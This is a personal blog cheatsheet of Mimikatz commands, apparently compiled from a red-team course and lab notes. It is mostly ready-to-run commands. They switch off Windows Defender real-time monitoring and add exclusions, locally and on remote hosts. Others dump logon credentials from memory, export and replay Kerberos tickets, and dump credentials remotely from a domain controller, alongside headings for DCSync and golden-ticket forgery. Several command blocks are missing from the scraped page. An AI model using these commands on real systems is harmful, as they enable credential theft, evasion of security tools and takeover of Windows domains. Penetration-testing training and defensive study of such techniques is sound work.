Mimikatz Cheatsheet

TL;DR Mimikatz cheatsheet of things I have found useful in CRTP and the lab.

Welcome to Part I of our cheatsheet series compiled from various courses, labs, stuff we did at work, Google, etc. Most of this was spread out over various howtos. This puts it all in one place. These are cheatsheets, almost no explanation is given, just commands. The links are to howtos that provide background.

Part I: Mimikatz cheatsheet

Part II: Set-Acl cheatsheet

Part III: Get-Acl cheatsheet

Part IV: Enumerating AD cheatsheet

Background

Yes, this info is out there already, most notably Sean Metcalf’s Guide to Mimikatz. This is just my personal cheatsheet for Mimikatz compiled from my notes taken during various labs, the CRTP course, etc.

Please note that I was using Invoke-Mimikatz.ps1 most of the time, therefore my cheatsheet is heavy on commands in that syntax. Generally speaking, if you’re using the *.exe then just run what is inside the quotes. I am also partial to PowerShell_ISE.

Please note that you can run multiple commands with Invoke-Mimikatz.ps1 by simply enclosing the entire thing in single quotes and each command in double quotes. Example:

Please note that Medium often mangles quotations, even in codeblocks. If you copy/paste a command and get an error then re-type the quotes in the CLI.

Running Mimikatz at all

Defender will block an unaltered copy of Mimikatz. Please do NOT rely on this alone in the workplace. Mimikatz is open source and freely available, therefore a dedicated attacker will simply modify it enough to not trip Defender. These researchers did it just to prove a point. Therefore focus on denying an attacker the rights needed to dump credentials. Failing that, focus on basic security hygiene so there isn’t anything usable in the dump.

With that disclaimer out of the way, here is how I have used Mimikatz in labs, CRTP, etc.

Launch PowerShell as admin, add a folder exception to Defender, turn off real time monitoring:

Add-MpPreference -ExclusionPath “C:\Temp”Set-MpPreference -DisableRealTimeMonitoring $trueImport-Module C:\Temp\Invoke-Mimikatz.ps1

Alternatively you can often get away with just running the AMSI bypass if you can’t turn off Defender. I have used this tactic with PowerView and PowerUp in the past:

Dumping creds with Mimikatz:

This is normally required first if running Mimikatz locally:

Invoke-Mimikatz -Command ‘“privilege::debug”’Invoke-Mimikatz -Command ‘“sekurlsa::logonpasswords”’

Please note that ‘logonpasswords’ lists everything except Credential Manager, as I found out once.

List the sekurlsa commands:

Check Credential Manager for things like saved RDP passwords:

If you are using mimikatz.exe:

token::elevateprivilege::debugsekurlsa::msv

Pass-The-Hash (PTH) with Mimikatz

Explanation, lab demo, and mitigations are here.

PTH and launch PowerShell_ISE as that user:

Pass-The-Ticket (PTT) with Mimikatz

Explanation, lab demo, and mitigations are here.

Export & list tickets:

Invoke-Command -ScriptBlock {Set-MpPreference –DisableRealTimeMonitoring $true} -ComputerName TestIPAMInvoke-Command -FilePath C:\Temp\Invoke-Mimikatz.ps1 -Session $sessEnter-PSSession $sessmkdir etccd .\etcInvoke-Mimikatz -Command ‘“sekurlsa::tickets /export”’

Copy/paste the name of the ticket to elevate with, then:

Confirm privileges:

Show tickets currently in use:

If you are having issues or getting weird errors, purge tickets and try again:

Dump creds remotely with Mimikatz

This only requires that you are running as a Domain User who has local admin rights on the remote system.

Invoke-Mimikatz -DumpCreds -ComputerName DC

DCSync

Explanation & lab demo here.

Grab the krbtgt NTLM

Forge a Golden Ticket using krbtgt hash & domain SID:

Alternatively, save the ticket for future use:

kerberos::ptt forged.kirbimisc::cmd

Forge a ticket to use in a trusting domain

In this case we have compromised a child domain and want to escalate to the parent domain. There is a trust relationship between them.

Load the ticket and start using privs in the parent domain:

References

Benjamin Delpy’s github with Mimikatz: https://github.com/ParrotSec/mimikatz

Sean Metcalf’s guide to Mimikatz: https://adsecurity.org/?page_id=1821

Microsoft Docs on klist: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rich

Rich

15 Followers

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.